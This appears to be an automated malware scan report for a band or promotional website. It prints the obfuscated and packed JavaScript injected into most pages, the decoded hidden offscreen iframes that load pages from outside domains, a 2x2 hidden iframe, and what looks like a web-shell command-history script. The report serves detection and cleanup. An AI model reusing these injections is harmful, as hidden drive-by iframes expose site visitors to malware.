Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kingcityrocks.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://kingcityrocks.com/ | 200 OK Content-Length: 18665 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function edieyfwqzfftiz(search,replace,subject){if(!(replace instanceof Array)){replace=new Array(replace);if(search instanceof Array){while(search.length>replace.length){replace[replace.length]=replace[0]}}}if(!(search instanceof Array))search=new Array(search);while(search.length>replace.length){replace[replace.length]=''}if(subject instanceof Array){for(k in subject){subject[k]=str_replace(search,replace,subject[k])}return subject}for(var k=0;k<search.length;k++){var i=subject.indexO Decoded script: <div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;"><iframe style="width:100%;height:100%" width="100%" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://preferrental.co.uk/1/index.php"></iframe></div> Antivirus reports:
| ||
http://kingcityrocks.com/index.html | 200 OK Content-Length: 18665 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function edieyfwqzfftiz(search,replace,subject){if(!(replace instanceof Array)){replace=new Array(replace);if(search instanceof Array){while(search.length>replace.length){replace[replace.length]=replace[0]}}}if(!(search instanceof Array))search=new Array(search);while(search.length>replace.length){replace[replace.length]=''}if(subject instanceof Array){for(k in subject){subject[k]=str_replace(search,replace,subject[k])}return subject}for(var k=0;k<search.length;k++){var i=subject.indexO Decoded script: <div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;"><iframe style="width:100%;height:100%" width="100%" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://preferrental.co.uk/1/index.php"></iframe></div> Antivirus reports:
| ||
http://kingcityrocks.com/photos.html | 200 OK Content-Length: 12427 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function edieyfwqzfftiz(search,replace,subject){if(!(replace instanceof Array)){replace=new Array(replace);if(search instanceof Array){while(search.length>replace.length){replace[replace.length]=replace[0]}}}if(!(search instanceof Array))search=new Array(search);while(search.length>replace.length){replace[replace.length]=''}if(subject instanceof Array){for(k in subject){subject[k]=str_replace(search,replace,subject[k])}return subject}for(var k=0;k<search.length;k++){var i=subject.indexO Decoded script: <div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;"><iframe style="width:100%;height:100%" width="100%" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://preferrental.co.uk/1/index.php"></iframe></div> Antivirus reports:
| ||
http://kingcityrocks.com/parties.html | 200 OK Content-Length: 12652 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function edieyfwqzfftiz(search,replace,subject){if(!(replace instanceof Array)){replace=new Array(replace);if(search instanceof Array){while(search.length>replace.length){replace[replace.length]=replace[0]}}}if(!(search instanceof Array))search=new Array(search);while(search.length>replace.length){replace[replace.length]=''}if(subject instanceof Array){for(k in subject){subject[k]=str_replace(search,replace,subject[k])}return subject}for(var k=0;k<search.length;k++){var i=subject.indexO Decoded script: <div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;"><iframe style="width:100%;height:100%" width="100%" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://preferrental.co.uk/1/index.php"></iframe></div> Antivirus reports:
| ||
http://kingcityrocks.com/booking.html | 200 OK Content-Length: 300786 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.5(\'<2 6="7://8.4.9.a/b/?1" c="1" d="1" e="0" f=0 g=0></2>\');',17,17,'||iframe|document||write|src|http|46|84|184|tds|width|height|frameborder|marginwidth|marginheight'.split('|'),0,{})) Decoded script: <div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;"><iframe style="width:100%;height:100%" width="100%" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://preferental.co.uk/1/index.php"></iframe></div> Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://j-wings.org/htky.html?i=2603928 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://j-wings.org/htky.html?i=2603928> | ||
http://kingcityrocks.com/contact.html | 200 OK Content-Length: 13306 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function edieyfwqzfftiz(search,replace,subject){if(!(replace instanceof Array)){replace=new Array(replace);if(search instanceof Array){while(search.length>replace.length){replace[replace.length]=replace[0]}}}if(!(search instanceof Array))search=new Array(search);while(search.length>replace.length){replace[replace.length]=''}if(subject instanceof Array){for(k in subject){subject[k]=str_replace(search,replace,subject[k])}return subject}for(var k=0;k<search.length;k++){var i=subject.indexO Decoded script: <div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;"><iframe style="width:100%;height:100%" width="100%" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://preferrental.co.uk/1/index.php"></iframe></div> Antivirus reports:
| ||
http://kingcityrocks.com/more.html | 200 OK Content-Length: 12780 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function edieyfwqzfftiz(search,replace,subject){if(!(replace instanceof Array)){replace=new Array(replace);if(search instanceof Array){while(search.length>replace.length){replace[replace.length]=replace[0]}}}if(!(search instanceof Array))search=new Array(search);while(search.length>replace.length){replace[replace.length]=''}if(subject instanceof Array){for(k in subject){subject[k]=str_replace(search,replace,subject[k])}return subject}for(var k=0;k<search.length;k++){var i=subject.indexO Decoded script: <div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;"><iframe style="width:100%;height:100%" width="100%" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://preferrental.co.uk/1/index.php"></iframe></div> Antivirus reports:
| ||
http://kingcityrocks.com/Brittany Russell Radio Disney Winner.wmv | 404 Not Found Content-Length: 300771 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(window.Event) window.captureEvents(Event.KEYDOWN); var cmds = new Array(''); var cur = 0; function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur]; else cur++; } else if(n == 40) { cur++; if(cur < cmds.length) document.cf.cmd.value = cmds[cur]; else cur--; } } function add(cmd) { cmds.pop(); cmds.push(cmd); cmds.push(''); cur = cmds.length-1; } Decoded script: <div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;"><iframe style="width:100%;height:100%" width="100%" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://preferental.co.uk/1/index.php"></iframe></div> Antivirus reports:
| ||
http://kingcityrocks.com/test404page.js | 404 Not Found Content-Length: 302147 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(window.Event) window.captureEvents(Event.KEYDOWN); var cmds = new Array(''); var cur = 0; function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur]; else cur++; } else if(n == 40) { cur++; if(cur < cmds.length) document.cf.cmd.value = cmds[cur]; else cur--; } } function add(cmd) { cmds.pop(); cmds.push(cmd); cmds.push(''); cur = cmds.length-1; } Decoded script: <div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;"><iframe style="width:100%;height:100%" width="100%" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://preferental.co.uk/1/index.php"></iframe></div> Antivirus reports:
| ||
http://kingcityrocks.com/brittpdf/brittpromo1.pdf | 200 OK Content-Length: 29846 Content-Type: application/pdf | clean |
http://kingcityrocks.com/brittpdf/brittpromo2.pdf | 200 OK Content-Length: 300702 Content-Type: application/pdf | clean |
http://kingcityrocks.com/brittpdf/brittpromo3.pdf | 200 OK Content-Length: 128080 Content-Type: application/pdf | clean |
http://kingcityrocks.com/brittpdf/Brittvippdf.pdf | 200 OK Content-Length: 29844 Content-Type: application/pdf | clean |
http://kingcityrocks.com/brittpdf/Brittpaperpdf.pdf | 200 OK Content-Length: 300700 Content-Type: application/pdf | clean |
http://kingcityrocks.com/shows.html | 200 OK Content-Length: 12960 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function edieyfwqzfftiz(search,replace,subject){if(!(replace instanceof Array)){replace=new Array(replace);if(search instanceof Array){while(search.length>replace.length){replace[replace.length]=replace[0]}}}if(!(search instanceof Array))search=new Array(search);while(search.length>replace.length){replace[replace.length]=''}if(subject instanceof Array){for(k in subject){subject[k]=str_replace(search,replace,subject[k])}return subject}for(var k=0;k<search.length;k++){var i=subject.indexO Decoded script: <div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;"><iframe style="width:100%;height:100%" width="100%" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://preferrental.co.uk/1/index.php"></iframe></div> Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kingcityrocks.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 24 Jan 2015 18:06:30 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 18665
Content-Type: text/html
...18665 bytes of data.
GET / HTTP/1.1
Host: kingcityrocks.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 24 Jan 2015 18:06:30 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 18665
Content-Type: text/html
...18665 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kingcityrocks.com
Referer: http://www.google.com/search?q=kingcityrocks.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kingcityrocks.com
Referer: http://www.google.com/search?q=kingcityrocks.com
Result:
The result is similar to the first query. There are no suspicious redirects found.